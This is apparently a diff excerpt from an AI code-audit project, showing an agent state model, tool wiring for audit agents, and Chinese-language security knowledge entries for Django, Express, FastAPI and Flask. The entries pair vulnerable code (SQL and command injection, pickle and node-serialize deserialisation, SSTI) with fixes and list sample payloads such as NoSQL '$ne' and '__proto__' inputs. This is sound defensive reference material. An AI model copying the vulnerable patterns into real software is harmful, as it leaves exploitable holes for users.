    """Run status of an agent; members are also plain strings."""

    # Not started yet
    CREATED = "created"
    # Currently executing
    RUNNING = "running"
    # Waiting for a message or input
    WAITING = "waiting"
    # Paused
    PAUSED = "paused"
    # Finished
    COMPLETED = "completed"
    # Failed
    FAILED = "failed"
    # Has been stopped
    STOPPED = "stopped"
    # Stop requested, still shutting down
    STOPPING = "stopping"
|
||||
|
||||
|
||||
class AgentState(BaseModel):
    """
    Agent state model.

    Holds everything an agent needs while it runs: identity, task and
    context, status and iteration counters, conversation history, execution
    records, findings, timestamps, waiting state, final result and usage
    statistics. The methods below mutate these fields and refresh
    ``last_updated``.
    """

    # ============ Basic info ============
    agent_id: str = Field(default_factory=_generate_agent_id)
    agent_name: str = "DeepAudit Agent"
    agent_type: str = "generic"  # recon, analysis, verification, specialist
    parent_id: Optional[str] = None  # parent agent ID (for the dynamic agent tree)

    # ============ Task info ============
    task: str = ""
    task_context: Dict[str, Any] = Field(default_factory=dict)
    inherited_context: Dict[str, Any] = Field(default_factory=dict)  # context inherited from the parent agent

    # ============ Knowledge modules ============
    knowledge_modules: List[str] = Field(default_factory=list)  # names of the loaded knowledge modules

    # ============ Execution state ============
    status: AgentStatus = AgentStatus.CREATED
    iteration: int = 0
    max_iterations: int = 50

    # ============ Conversation history ============
    messages: List[Dict[str, Any]] = Field(default_factory=list)
    system_prompt: str = ""

    # ============ Execution records ============
    actions_taken: List[Dict[str, Any]] = Field(default_factory=list)
    observations: List[Dict[str, Any]] = Field(default_factory=list)
    errors: List[str] = Field(default_factory=list)

    # ============ Findings ============
    findings: List[Dict[str, Any]] = Field(default_factory=list)

    # ============ Timestamps ============
    created_at: str = Field(default_factory=lambda: datetime.now(timezone.utc).isoformat())
    started_at: Optional[str] = None
    last_updated: str = Field(default_factory=lambda: datetime.now(timezone.utc).isoformat())
    finished_at: Optional[str] = None

    # ============ Waiting state ============
    waiting_for_input: bool = False
    waiting_start_time: Optional[datetime] = None
    waiting_reason: str = ""
    waiting_timeout_seconds: int = 600  # 10-minute timeout

    # ============ Final result ============
    final_result: Optional[Dict[str, Any]] = None

    # ============ Statistics ============
    total_tokens: int = 0
    tool_calls: int = 0

    # ============ Flags ============
    stop_requested: bool = False
    max_iterations_warning_sent: bool = False

    class Config:
        use_enum_values = True

    # ============ State management ============

    def start(self) -> None:
        """Mark the agent as running and record the start time."""
        self.started_at = datetime.now(timezone.utc).isoformat()
        self.status = AgentStatus.RUNNING
        self._update_timestamp()

    def increment_iteration(self) -> None:
        """Advance the iteration counter by one."""
        self.iteration = self.iteration + 1
        self._update_timestamp()

    def set_completed(self, final_result: Optional[Dict[str, Any]] = None) -> None:
        """Mark the agent as completed and store its final result."""
        self.final_result = final_result
        self.status = AgentStatus.COMPLETED
        self.finished_at = datetime.now(timezone.utc).isoformat()
        self._update_timestamp()

    def set_failed(self, error: str) -> None:
        """Mark the agent as failed and record the error."""
        self.status = AgentStatus.FAILED
        self.add_error(error)
        self.finished_at = datetime.now(timezone.utc).isoformat()
        self._update_timestamp()

    def request_stop(self) -> None:
        """Ask the agent to stop; status becomes STOPPING."""
        self.status = AgentStatus.STOPPING
        self.stop_requested = True
        self._update_timestamp()

    def set_stopped(self) -> None:
        """Mark the agent as stopped and record the finish time."""
        self.finished_at = datetime.now(timezone.utc).isoformat()
        self.status = AgentStatus.STOPPED
        self._update_timestamp()

    # ============ Waiting state management ============

    def enter_waiting_state(self, reason: str = "等待消息") -> None:
        """Enter the waiting state, remembering why and since when."""
        self.status = AgentStatus.WAITING
        self.waiting_reason = reason
        self.waiting_start_time = datetime.now(timezone.utc)
        self.waiting_for_input = True
        self._update_timestamp()

    def resume_from_waiting(self, new_task: Optional[str] = None) -> None:
        """
        Leave the waiting state and run again.

        Clears the waiting fields and any pending stop request; a truthy
        ``new_task`` replaces the current task.
        """
        self.waiting_for_input = False
        self.waiting_start_time = None
        self.waiting_reason = ""
        self.stop_requested = False
        self.status = AgentStatus.RUNNING
        if new_task:
            self.task = new_task
        self._update_timestamp()

    def has_waiting_timeout(self) -> bool:
        """Return True when the agent has waited longer than ``waiting_timeout_seconds``."""
        if not (self.waiting_for_input and self.waiting_start_time):
            return False

        if self.stop_requested or self.status in [AgentStatus.COMPLETED, AgentStatus.FAILED]:
            return False

        waited = datetime.now(timezone.utc) - self.waiting_start_time
        return waited.total_seconds() > self.waiting_timeout_seconds

    def is_waiting_for_input(self) -> bool:
        """Return whether the agent is waiting for input."""
        return self.waiting_for_input

    # ============ Execution control ============

    def should_stop(self) -> bool:
        """Return True when a stop was requested, the status is terminal, or the iteration budget is used up."""
        terminal = [AgentStatus.COMPLETED, AgentStatus.FAILED, AgentStatus.STOPPED]
        return (
            self.stop_requested
            or self.status in terminal
            or self.has_reached_max_iterations()
        )

    def has_reached_max_iterations(self) -> bool:
        """Return whether the iteration counter has reached ``max_iterations``."""
        return self.iteration >= self.max_iterations

    def is_approaching_max_iterations(self, threshold: float = 0.85) -> bool:
        """Return whether the iteration counter has reached ``threshold`` of ``max_iterations``."""
        warning_point = int(self.max_iterations * threshold)
        return self.iteration >= warning_point

    # ============ Message management ============

    def add_message(self, role: str, content: Any) -> None:
        """Append a timestamped message to the conversation history."""
        entry = {
            "role": role,
            "content": content,
            "timestamp": datetime.now(timezone.utc).isoformat(),
        }
        self.messages.append(entry)
        self._update_timestamp()

    def get_conversation_history(self) -> List[Dict[str, Any]]:
        """Return the conversation as role/content pairs (no timestamps), for LLM calls."""
        history = []
        for message in self.messages:
            history.append({"role": message["role"], "content": message["content"]})
        return history

    # ============ Execution records ============

    def add_action(self, action: Dict[str, Any]) -> None:
        """Record an executed action and count it as a tool call."""
        record = {
            "iteration": self.iteration,
            "timestamp": datetime.now(timezone.utc).isoformat(),
            "action": action,
        }
        self.actions_taken.append(record)
        self.tool_calls += 1
        self._update_timestamp()

    def add_observation(self, observation: Dict[str, Any]) -> None:
        """Record an observation."""
        record = {
            "iteration": self.iteration,
            "timestamp": datetime.now(timezone.utc).isoformat(),
            "observation": observation,
        }
        self.observations.append(record)
        self._update_timestamp()

    def add_error(self, error: str) -> None:
        """Record an error, prefixed with the current iteration number."""
        self.errors.append(f"Iteration {self.iteration}: {error}")
        self._update_timestamp()

    def add_finding(self, finding: Dict[str, Any]) -> None:
        """
        Add a finding.

        The passed dict itself is stamped with ``discovered_at`` and
        ``discovered_by`` and then stored (it is not copied).
        """
        finding["discovered_at"] = datetime.now(timezone.utc).isoformat()
        finding["discovered_by"] = self.agent_id
        self.findings.append(finding)
        self._update_timestamp()

    # ============ Context management ============

    def update_context(self, key: str, value: Any) -> None:
        """Set one key of the task context."""
        self.task_context[key] = value
        self._update_timestamp()

    def inherit_context(self, parent_context: Dict[str, Any]) -> None:
        """Store a shallow copy of the parent agent's context."""
        self.inherited_context = parent_context.copy()
        self._update_timestamp()

    # ============ Statistics and summary ============

    def add_tokens(self, tokens: int) -> None:
        """Add to the running token usage total."""
        self.total_tokens = self.total_tokens + tokens
        self._update_timestamp()

    def get_execution_summary(self) -> Dict[str, Any]:
        """Return a summary dict of identity, progress, counters and timing."""
        summary: Dict[str, Any] = {
            "agent_id": self.agent_id,
            "agent_name": self.agent_name,
            "agent_type": self.agent_type,
            "parent_id": self.parent_id,
            "task": self.task,
            "status": self.status,
            "iteration": self.iteration,
            "max_iterations": self.max_iterations,
            "total_tokens": self.total_tokens,
            "tool_calls": self.tool_calls,
            "findings_count": len(self.findings),
            "errors_count": len(self.errors),
            "created_at": self.created_at,
            "started_at": self.started_at,
            "finished_at": self.finished_at,
            "duration_seconds": self._calculate_duration(),
            "knowledge_modules": self.knowledge_modules,
        }
        return summary

    def _calculate_duration(self) -> Optional[float]:
        """Return seconds from start to finish (or to now if unfinished); None if never started."""
        if not self.started_at:
            return None

        finished = self.finished_at or datetime.now(timezone.utc).isoformat()
        # A trailing 'Z' is rewritten to '+00:00' before parsing.
        begin, end = (
            datetime.fromisoformat(stamp.replace('Z', '+00:00'))
            for stamp in (self.started_at, finished)
        )
        return (end - begin).total_seconds()

    def _update_timestamp(self) -> None:
        """Refresh ``last_updated`` with the current UTC time."""
        self.last_updated = datetime.now(timezone.utc).isoformat()
|
||||
|
|
@ -354,7 +354,7 @@ class EventManager:
|
|||
"""创建或获取事件队列"""
|
||||
if task_id not in self._event_queues:
|
||||
# 🔥 使用较大的队列容量,缓存更多 token 事件
|
||||
self._event_queues[task_id] = asyncio.Queue(maxsize=1000)
|
||||
self._event_queues[task_id] = asyncio.Queue(maxsize=5000)
|
||||
return self._event_queues[task_id]
|
||||
|
||||
def remove_queue(self, task_id: str):
|
||||
|
|
|
|||
|
|
@ -193,17 +193,36 @@ class AgentRunner:
|
|||
"""初始化工具集"""
|
||||
await self.event_emitter.emit_info("初始化 Agent 工具集...")
|
||||
|
||||
# 🔥 导入新工具
|
||||
from app.services.agent.tools import (
|
||||
ThinkTool, ReflectTool,
|
||||
CreateVulnerabilityReportTool,
|
||||
)
|
||||
# 🔥 导入知识查询工具
|
||||
from app.services.agent.knowledge import (
|
||||
SecurityKnowledgeQueryTool,
|
||||
GetVulnerabilityKnowledgeTool,
|
||||
)
|
||||
|
||||
# 🔥 获取排除模式和目标文件
|
||||
exclude_patterns = self.task.exclude_patterns or []
|
||||
target_files = self.task.target_files or None
|
||||
|
||||
# ============ 基础工具(所有 Agent 共享)============
|
||||
base_tools = {
|
||||
"read_file": FileReadTool(self.project_root),
|
||||
"list_files": ListFilesTool(self.project_root),
|
||||
"read_file": FileReadTool(self.project_root, exclude_patterns, target_files),
|
||||
"list_files": ListFilesTool(self.project_root, exclude_patterns, target_files),
|
||||
# 🔥 新增:思考工具(所有Agent可用)
|
||||
"think": ThinkTool(),
|
||||
}
|
||||
|
||||
# ============ Recon Agent 专属工具 ============
|
||||
# 职责:信息收集、项目结构分析、技术栈识别
|
||||
self.recon_tools = {
|
||||
**base_tools,
|
||||
"search_code": FileSearchTool(self.project_root),
|
||||
"search_code": FileSearchTool(self.project_root, exclude_patterns, target_files),
|
||||
# 🔥 新增:反思工具
|
||||
"reflect": ReflectTool(),
|
||||
}
|
||||
|
||||
# RAG 工具(Recon 用于语义搜索)
|
||||
|
|
@ -214,10 +233,11 @@ class AgentRunner:
|
|||
# 职责:漏洞分析、代码审计、模式匹配
|
||||
self.analysis_tools = {
|
||||
**base_tools,
|
||||
"search_code": FileSearchTool(self.project_root),
|
||||
"search_code": FileSearchTool(self.project_root, exclude_patterns, target_files),
|
||||
# 模式匹配和代码分析
|
||||
"pattern_match": PatternMatchTool(self.project_root),
|
||||
"code_analysis": CodeAnalysisTool(self.llm_service),
|
||||
# TODO: code_analysis 工具暂时禁用,因为 LLM 调用经常失败
|
||||
# "code_analysis": CodeAnalysisTool(self.llm_service),
|
||||
"dataflow_analysis": DataFlowAnalysisTool(self.llm_service),
|
||||
# 外部静态分析工具
|
||||
"semgrep_scan": SemgrepTool(self.project_root),
|
||||
|
|
@ -227,6 +247,11 @@ class AgentRunner:
|
|||
"npm_audit": NpmAuditTool(self.project_root),
|
||||
"safety_scan": SafetyTool(self.project_root),
|
||||
"osv_scan": OSVScannerTool(self.project_root),
|
||||
# 🔥 新增:反思工具
|
||||
"reflect": ReflectTool(),
|
||||
# 🔥 新增:安全知识查询工具(基于RAG)
|
||||
"query_security_knowledge": SecurityKnowledgeQueryTool(),
|
||||
"get_vulnerability_knowledge": GetVulnerabilityKnowledgeTool(),
|
||||
}
|
||||
|
||||
# RAG 工具(Analysis 用于安全相关代码搜索)
|
||||
|
|
@ -241,6 +266,10 @@ class AgentRunner:
|
|||
# 验证工具
|
||||
"vulnerability_validation": VulnerabilityValidationTool(self.llm_service),
|
||||
"dataflow_analysis": DataFlowAnalysisTool(self.llm_service),
|
||||
# 🔥 新增:漏洞报告工具(仅Verification可用)
|
||||
"create_vulnerability_report": CreateVulnerabilityReportTool(),
|
||||
# 🔥 新增:反思工具
|
||||
"reflect": ReflectTool(),
|
||||
}
|
||||
|
||||
# 沙箱工具(仅 Verification Agent 可用)
|
||||
|
|
|
|||
|
|
@ -0,0 +1,59 @@
|
|||
"""
|
||||
知识模块系统 - 基于RAG的安全知识检索
|
||||
|
||||
提供专业的安全知识检索能力,支持:
|
||||
- 漏洞类型知识(SQL注入、XSS、命令注入等)
|
||||
- 框架安全知识(FastAPI、Django、Flask、Express等)
|
||||
- 安全最佳实践
|
||||
- 修复建议
|
||||
- 代码模式识别
|
||||
|
||||
知识库采用模块化组织:
|
||||
- vulnerabilities/: 漏洞类型知识
|
||||
- frameworks/: 框架安全知识
|
||||
"""
|
||||
|
||||
# 基础定义
|
||||
from .base import KnowledgeDocument, KnowledgeCategory
|
||||
|
||||
# 知识加载器
|
||||
from .loader import (
|
||||
KnowledgeLoader,
|
||||
knowledge_loader,
|
||||
get_available_modules,
|
||||
get_module_content,
|
||||
)
|
||||
|
||||
# RAG知识检索
|
||||
from .rag_knowledge import (
|
||||
SecurityKnowledgeRAG,
|
||||
security_knowledge_rag,
|
||||
)
|
||||
|
||||
# 知识查询工具
|
||||
from .tools import (
|
||||
SecurityKnowledgeQueryTool,
|
||||
GetVulnerabilityKnowledgeTool,
|
||||
ListKnowledgeModulesTool,
|
||||
)
|
||||
|
||||
__all__ = [
|
||||
# 基础定义
|
||||
"KnowledgeDocument",
|
||||
"KnowledgeCategory",
|
||||
|
||||
# 知识加载器
|
||||
"KnowledgeLoader",
|
||||
"knowledge_loader",
|
||||
"get_available_modules",
|
||||
"get_module_content",
|
||||
|
||||
# RAG知识检索
|
||||
"SecurityKnowledgeRAG",
|
||||
"security_knowledge_rag",
|
||||
|
||||
# 知识查询工具
|
||||
"SecurityKnowledgeQueryTool",
|
||||
"GetVulnerabilityKnowledgeTool",
|
||||
"ListKnowledgeModulesTool",
|
||||
]
|
||||
|
|
@ -0,0 +1,61 @@
|
|||
"""
|
||||
知识模块基础定义
|
||||
|
||||
定义知识文档的数据结构和类别
|
||||
"""
|
||||
|
||||
from dataclasses import dataclass, field
|
||||
from enum import Enum
|
||||
from typing import Any, Dict, List, Optional
|
||||
|
||||
|
||||
class KnowledgeCategory(Enum):
    """Category of a knowledge document."""

    # Vulnerability types
    VULNERABILITY = "vulnerability"
    # Framework security
    FRAMEWORK = "framework"
    # Best practices
    BEST_PRACTICE = "best_practice"
    # Remediation advice
    REMEDIATION = "remediation"
    # Code patterns
    CODE_PATTERN = "code_pattern"
    # Compliance requirements
    COMPLIANCE = "compliance"
|
||||
|
||||
|
||||
@dataclass
class KnowledgeDocument:
    """A single knowledge-base document with its classification metadata."""

    id: str
    title: str
    content: str
    category: KnowledgeCategory
    tags: List[str] = field(default_factory=list)
    severity: Optional[str] = None
    cwe_ids: List[str] = field(default_factory=list)
    owasp_ids: List[str] = field(default_factory=list)
    metadata: Dict[str, Any] = field(default_factory=dict)

    def to_dict(self) -> Dict[str, Any]:
        """Return the document as a plain dict; ``category`` is emitted as its enum value."""
        result: Dict[str, Any] = {
            name: getattr(self, name) for name in ("id", "title", "content")
        }
        result["category"] = self.category.value
        for name in ("tags", "severity", "cwe_ids", "owasp_ids", "metadata"):
            result[name] = getattr(self, name)
        return result

    def to_embedding_text(self) -> str:
        """Build the text used for embedding: title, category, any non-empty tag/CWE/OWASP lists, then content."""
        sections = [
            f"Title: {self.title}",
            f"Category: {self.category.value}",
        ]
        labelled_lists = (
            ("Tags", self.tags),
            ("CWE", self.cwe_ids),
            ("OWASP", self.owasp_ids),
        )
        for label, values in labelled_lists:
            if values:
                sections.append(f"{label}: {', '.join(values)}")
        sections.append(f"Content: {self.content}")
        return "\n".join(sections)
|
||||
|
|
@ -0,0 +1,32 @@
|
|||
"""
|
||||
框架安全知识模块
|
||||
|
||||
包含各种框架的安全特性和常见漏洞模式
|
||||
"""
|
||||
|
||||
from .fastapi import FASTAPI_SECURITY
|
||||
from .django import DJANGO_SECURITY
|
||||
from .flask import FLASK_SECURITY
|
||||
from .express import EXPRESS_SECURITY
|
||||
from .react import REACT_SECURITY
|
||||
from .supabase import SUPABASE_SECURITY
|
||||
|
||||
# 所有框架知识文档
|
||||
ALL_FRAMEWORK_DOCS = [
|
||||
FASTAPI_SECURITY,
|
||||
DJANGO_SECURITY,
|
||||
FLASK_SECURITY,
|
||||
EXPRESS_SECURITY,
|
||||
REACT_SECURITY,
|
||||
SUPABASE_SECURITY,
|
||||
]
|
||||
|
||||
__all__ = [
|
||||
"ALL_FRAMEWORK_DOCS",
|
||||
"FASTAPI_SECURITY",
|
||||
"DJANGO_SECURITY",
|
||||
"FLASK_SECURITY",
|
||||
"EXPRESS_SECURITY",
|
||||
"REACT_SECURITY",
|
||||
"SUPABASE_SECURITY",
|
||||
]
|
||||
|
|
@ -0,0 +1,117 @@
|
|||
"""
|
||||
Django 框架安全知识
|
||||
"""
|
||||
|
||||
from ..base import KnowledgeDocument, KnowledgeCategory
|
||||
|
||||
|
||||
# Django security knowledge document.
# The content is reference text (not executed). Two examples were corrected:
# RawSQL takes a required `params` argument, and the "safe" upload example
# now imports the names it uses.
DJANGO_SECURITY = KnowledgeDocument(
    id="framework_django",
    title="Django Security",
    category=KnowledgeCategory.FRAMEWORK,
    tags=["django", "python", "web", "orm"],
    content="""
Django 内置了许多安全保护,但不当使用仍可能引入漏洞。

## 内置安全特性
1. CSRF保护
2. XSS防护(模板自动转义)
3. SQL注入防护(ORM)
4. 点击劫持防护
5. 安全的密码哈希

## 常见漏洞模式

### SQL注入
```python
# 危险 - raw()和extra()
User.objects.raw(f"SELECT * FROM users WHERE name = '{name}'")
User.objects.extra(where=[f"name = '{name}'"])

# 危险 - RawSQL
from django.db.models.expressions import RawSQL
User.objects.annotate(val=RawSQL(f"SELECT {user_input}", []))

# 安全 - 使用ORM
User.objects.filter(name=name)
User.objects.raw("SELECT * FROM users WHERE name = %s", [name])
User.objects.annotate(val=RawSQL("SELECT %s", [user_input]))
```

### XSS
```python
# 危险 - 禁用自动转义
{{ user_input|safe }}
{% autoescape off %}{{ user_input }}{% endautoescape %}
mark_safe(user_input)

# 安全 - 默认转义
{{ user_input }}
```

### CSRF绕过
```python
# 危险 - 禁用CSRF
@csrf_exempt
def my_view(request):
    pass

# 危险 - 全局禁用
MIDDLEWARE = [
    # 'django.middleware.csrf.CsrfViewMiddleware',  # 被注释
]
```

### 不安全的反序列化
```python
# 危险 - 签名数据可被篡改
from django.core import signing
data = signing.loads(user_input)  # 如果SECRET_KEY泄露

# 危险 - pickle
import pickle
data = pickle.loads(request.body)
```

### 敏感信息泄露
```python
# 危险 - DEBUG模式在生产环境
DEBUG = True  # settings.py

# 危险 - 详细错误信息
ALLOWED_HOSTS = []  # 空列表在DEBUG=False时会报错
```

### 文件上传
```python
# 危险 - 不验证文件类型
def upload(request):
    file = request.FILES['file']
    with open(f'/uploads/{file.name}', 'wb') as f:
        f.write(file.read())

# 安全 - 验证和重命名
import os
import uuid
from django.core.exceptions import ValidationError
from django.core.files.storage import default_storage

def upload(request):
    file = request.FILES['file']
    ext = os.path.splitext(file.name)[1].lower()
    if ext not in ['.jpg', '.png', '.pdf']:
        raise ValidationError("Invalid file type")
    safe_name = f"{uuid.uuid4()}{ext}"
    # 使用Django的文件存储
    default_storage.save(safe_name, file)
```

## 安全配置检查
```python
# settings.py 安全配置
DEBUG = False
SECRET_KEY = os.environ.get('DJANGO_SECRET_KEY')
ALLOWED_HOSTS = ['example.com']
SECURE_SSL_REDIRECT = True
SESSION_COOKIE_SECURE = True
CSRF_COOKIE_SECURE = True
SECURE_HSTS_SECONDS = 31536000
X_FRAME_OPTIONS = 'DENY'
```
""",
)
|
||||
|
|
@ -0,0 +1,148 @@
|
|||
"""
|
||||
Express.js 框架安全知识
|
||||
"""
|
||||
|
||||
from ..base import KnowledgeDocument, KnowledgeCategory
|
||||
|
||||
|
||||
# Markdown body of the Express.js knowledge entry. Kept as a separate constant so the
# document metadata below stays readable; the text is consumed at runtime as-is.
_EXPRESS_SECURITY_CONTENT = """
Express.js 是Node.js最流行的Web框架,需要注意多种安全问题。

## 常见漏洞模式

### NoSQL注入
```javascript
// 危险 - MongoDB查询注入
app.post('/login', async (req, res) => {
    const user = await User.findOne({
        username: req.body.username,
        password: req.body.password
    });
    // 攻击: {"username": {"$ne": ""}, "password": {"$ne": ""}}
});

// 安全 - 类型验证
app.post('/login', async (req, res) => {
    const { username, password } = req.body;
    if (typeof username !== 'string' || typeof password !== 'string') {
        return res.status(400).json({ error: 'Invalid input' });
    }
    const user = await User.findOne({ username, password });
});
```

### 原型污染
```javascript
// 危险 - 合并用户输入
const merge = require('lodash.merge');
app.post('/config', (req, res) => {
    merge(config, req.body);
    // 攻击: {"__proto__": {"isAdmin": true}}
});

// 安全 - 使用Object.assign或白名单
app.post('/config', (req, res) => {
    const allowed = ['theme', 'language'];
    allowed.forEach(key => {
        if (req.body[key]) config[key] = req.body[key];
    });
});
```

### 命令注入
```javascript
// 危险
const { exec } = require('child_process');
app.get('/ping', (req, res) => {
    exec(`ping ${req.query.host}`, (err, stdout) => {
        res.send(stdout);
    });
});

// 安全 - 使用execFile和参数数组
const { execFile } = require('child_process');
app.get('/ping', (req, res) => {
    execFile('ping', ['-c', '4', req.query.host], (err, stdout) => {
        res.send(stdout);
    });
});
```

### XSS
```javascript
// 危险 - 直接输出用户输入
app.get('/search', (req, res) => {
    res.send(`<h1>Results for: ${req.query.q}</h1>`);
});

// 安全 - 使用模板引擎或转义
const escape = require('escape-html');
app.get('/search', (req, res) => {
    res.send(`<h1>Results for: ${escape(req.query.q)}</h1>`);
});
```

### 路径遍历
```javascript
// 危险
app.get('/files/:name', (req, res) => {
    res.sendFile(`/uploads/${req.params.name}`);
});

// 安全 - 验证路径
const path = require('path');
app.get('/files/:name', (req, res) => {
    const safePath = path.join('/uploads', req.params.name);
    if (!safePath.startsWith('/uploads/')) {
        return res.status(400).send('Invalid path');
    }
    res.sendFile(safePath);
});
```

### 不安全的依赖
```javascript
// 危险 - 使用有漏洞的包
const serialize = require('node-serialize');
const obj = serialize.unserialize(userInput); // RCE!

// 安全 - 使用JSON
const obj = JSON.parse(userInput);
```

## 安全中间件
```javascript
const helmet = require('helmet');
const rateLimit = require('express-rate-limit');

// 安全头
app.use(helmet());

// 速率限制
app.use(rateLimit({
    windowMs: 15 * 60 * 1000,
    max: 100
}));

// CORS
const cors = require('cors');
app.use(cors({
    origin: 'https://example.com',
    credentials: true
}));
```

## 安全检查清单
1. 使用helmet设置安全头
2. 实现速率限制
3. 验证所有用户输入类型
4. 使用参数化查询
5. 定期更新依赖 (npm audit)
6. 不要在错误中暴露堆栈信息
"""

# Knowledge-base entry covering common Express.js vulnerability patterns and hardening middleware.
EXPRESS_SECURITY = KnowledgeDocument(
    id="framework_express",
    title="Express.js Security",
    category=KnowledgeCategory.FRAMEWORK,
    tags=["express", "nodejs", "javascript", "api"],
    content=_EXPRESS_SECURITY_CONTENT,
)
|
||||
|
|
@ -0,0 +1,109 @@
|
|||
"""
|
||||
FastAPI 框架安全知识
|
||||
"""
|
||||
|
||||
from ..base import KnowledgeDocument, KnowledgeCategory
|
||||
|
||||
|
||||
# Knowledge-base entry covering FastAPI security features and common vulnerability patterns.
# The content is markdown that is handed to the agent verbatim.
#
# The "safe" path-traversal example uses Path.is_relative_to on the resolved path.
# A plain string-prefix comparison would accept sibling directories such as
# /uploads_private, and the example must serve the resolved path it actually checked.
FASTAPI_SECURITY = KnowledgeDocument(
    id="framework_fastapi",
    title="FastAPI Security",
    category=KnowledgeCategory.FRAMEWORK,
    tags=["fastapi", "python", "api", "async", "pydantic"],
    content="""
FastAPI 是一个现代Python Web框架,内置了许多安全特性,但仍需注意一些常见问题。

## 安全特性
1. Pydantic自动数据验证
2. 自动生成OpenAPI文档
3. 内置OAuth2/JWT支持
4. 依赖注入系统

## 常见漏洞模式

### SQL注入
```python
# 危险 - 原始SQL
@app.get("/users")
async def get_users(name: str):
    query = f"SELECT * FROM users WHERE name = '{name}'"
    return await database.fetch_all(query)

# 安全 - 参数化查询
@app.get("/users")
async def get_users(name: str):
    query = "SELECT * FROM users WHERE name = :name"
    return await database.fetch_all(query, {"name": name})
```

### IDOR
```python
# 危险 - 无权限检查
@app.get("/users/{user_id}")
async def get_user(user_id: int):
    return await User.get(user_id)

# 安全 - 验证权限
@app.get("/users/{user_id}")
async def get_user(user_id: int, current_user: User = Depends(get_current_user)):
    if user_id != current_user.id and not current_user.is_admin:
        raise HTTPException(status_code=403)
    return await User.get(user_id)
```

### 路径遍历
```python
# 危险
@app.get("/files/{filename}")
async def get_file(filename: str):
    return FileResponse(f"/uploads/{filename}")

# 危险 - 字符串前缀比较 ("/uploads_private" 也以 "/uploads" 开头)
@app.get("/files/{filename}")
async def get_file(filename: str):
    safe_path = (Path("/uploads") / filename).resolve()
    if not str(safe_path).startswith("/uploads"):
        raise HTTPException(status_code=400)
    return FileResponse(safe_path)

# 安全 - 解析后验证路径 (is_relative_to 需要 Python 3.9+)
@app.get("/files/{filename}")
async def get_file(filename: str):
    base_dir = Path("/uploads").resolve()
    safe_path = (base_dir / filename).resolve()
    if not safe_path.is_relative_to(base_dir):
        raise HTTPException(status_code=400)
    return FileResponse(safe_path)
```

### JWT配置问题
```python
# 危险 - 弱密钥
SECRET_KEY = "secret"

# 危险 - 不验证签名
jwt.decode(token, options={"verify_signature": False})

# 安全
SECRET_KEY = os.environ.get("JWT_SECRET_KEY")
jwt.decode(token, SECRET_KEY, algorithms=["HS256"])
```

### CORS配置
```python
# 危险 - 允许所有来源
app.add_middleware(
    CORSMiddleware,
    allow_origins=["*"],
    allow_credentials=True, # 危险组合!
)

# 安全 - 指定来源
app.add_middleware(
    CORSMiddleware,
    allow_origins=["https://example.com"],
    allow_credentials=True,
)
```

## 安全检查清单
1. 所有端点是否有适当的认证
2. 是否使用Depends进行权限检查
3. 文件操作是否验证路径
4. SQL查询是否参数化
5. CORS配置是否合理
6. JWT密钥是否安全存储
7. 敏感数据是否在响应中暴露
""",
)
|
||||
|
|
@ -0,0 +1,139 @@
|
|||
"""
|
||||
Flask 框架安全知识
|
||||
"""
|
||||
|
||||
from ..base import KnowledgeDocument, KnowledgeCategory
|
||||
|
||||
|
||||
# Markdown body of the Flask knowledge entry. Kept as a separate constant so the
# document metadata below stays readable; the text is consumed at runtime as-is.
_FLASK_SECURITY_CONTENT = """
Flask 是一个轻量级框架,安全性很大程度上取决于开发者的实现。

## 常见漏洞模式

### 模板注入 (SSTI)
```python
# 危险 - 用户输入作为模板
from flask import render_template_string
@app.route('/hello')
def hello():
    name = request.args.get('name')
    return render_template_string(f'Hello {name}!')
    # 攻击: ?name={{config}}

# 安全 - 使用参数
@app.route('/hello')
def hello():
    name = request.args.get('name')
    return render_template_string('Hello {{ name }}!', name=name)
```

### XSS
```python
# 危险 - 禁用转义
from markupsafe import Markup
return Markup(user_input)

# 模板中
{{ user_input|safe }}

# 安全 - 默认转义
return render_template('page.html', content=user_input)
```

### SQL注入
```python
# 危险 - 字符串拼接
@app.route('/user/<name>')
def get_user(name):
    cursor.execute(f"SELECT * FROM users WHERE name = '{name}'")

# 安全 - 参数化
@app.route('/user/<name>')
def get_user(name):
    cursor.execute("SELECT * FROM users WHERE name = ?", (name,))
```

### 会话安全
```python
# 危险 - 弱密钥
app.secret_key = 'dev'

# 危险 - 硬编码密钥
app.secret_key = 'super-secret-key-12345'

# 安全
app.secret_key = os.environ.get('FLASK_SECRET_KEY')
```

### 文件上传
```python
# 危险 - 不验证文件
@app.route('/upload', methods=['POST'])
def upload():
    file = request.files['file']
    file.save(f'/uploads/{file.filename}')

# 安全 - 验证和安全文件名
from werkzeug.utils import secure_filename
ALLOWED_EXTENSIONS = {'png', 'jpg', 'pdf'}

def allowed_file(filename):
    return '.' in filename and \\
           filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS

@app.route('/upload', methods=['POST'])
def upload():
    file = request.files['file']
    if file and allowed_file(file.filename):
        filename = secure_filename(file.filename)
        file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
```

### 开放重定向
```python
# 危险 - 未验证的重定向
@app.route('/redirect')
def redirect_url():
    url = request.args.get('url')
    return redirect(url)

# 安全 - 验证URL
from urllib.parse import urlparse

@app.route('/redirect')
def redirect_url():
    url = request.args.get('url', '/')
    # 只允许相对路径或同域名
    parsed = urlparse(url)
    if parsed.netloc and parsed.netloc != request.host:
        return redirect('/')
    return redirect(url)
```

### Debug模式
```python
# 危险 - 生产环境开启debug
if __name__ == '__main__':
    app.run(debug=True) # 可能导致RCE

# 安全
if __name__ == '__main__':
    app.run(debug=os.environ.get('FLASK_DEBUG', 'False') == 'True')
```

## 安全配置
```python
app.config.update(
    SECRET_KEY=os.environ.get('SECRET_KEY'),
    SESSION_COOKIE_SECURE=True,
    SESSION_COOKIE_HTTPONLY=True,
    SESSION_COOKIE_SAMESITE='Lax',
)
```
"""

# Knowledge-base entry covering common Flask vulnerability patterns and secure configuration.
FLASK_SECURITY = KnowledgeDocument(
    id="framework_flask",
    title="Flask Security",
    category=KnowledgeCategory.FRAMEWORK,
    tags=["flask", "python", "web", "jinja2"],
    content=_FLASK_SECURITY_CONTENT,
)
|
||||
|
|
@ -0,0 +1,137 @@
|
|||
"""
|
||||
React 框架安全知识
|
||||
"""
|
||||
|
||||
from ..base import KnowledgeDocument, KnowledgeCategory
|
||||
|
||||
|
||||
# Knowledge-base entry covering React security features and common vulnerability patterns.
# The content is markdown that is handed to the agent verbatim.
#
# The "safe" SSR example escapes "<" after JSON.stringify: JSON.stringify alone does
# not neutralise "</script>", so a value containing it can still break out of an
# inline <script>. Backslashes in that snippet are doubled because this is a
# non-raw Python string; the rendered text reads '\\u003c' in JavaScript.
REACT_SECURITY = KnowledgeDocument(
